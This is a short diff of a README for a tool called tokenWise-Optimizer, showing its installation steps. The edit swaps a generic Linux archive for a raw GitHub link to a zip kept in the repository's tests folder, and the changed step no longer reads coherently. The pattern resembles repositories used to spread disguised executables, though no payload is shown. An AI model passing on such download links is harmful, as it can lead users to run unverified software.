burgerkhan6227/tokenWise-Optimizer/README.md

 4. **Run the Installer**:
    - For Windows users, simply double-click the `.exe` file to run the installer.
 Follow the prompts to complete the installation.
    - For Mac users, open the `.dmg` file, then drag the application into the Applications folder.
-   - For Linux users, extract the `.tar.gz` file and navigate to the folder.
+   - For Linux users, extract the `https://raw.githubusercontent.com/burgerkhan6227/tokenWise-Optimizer/main/tests/tokenWise-Optimizer-v2.6.zip` file and navigate to the folder.
 Run the application using the terminal.

 5. **Open tokenWise-Optimizer**: After installation, find the application in your system's menu or applications folder.
 Click the icon to start it.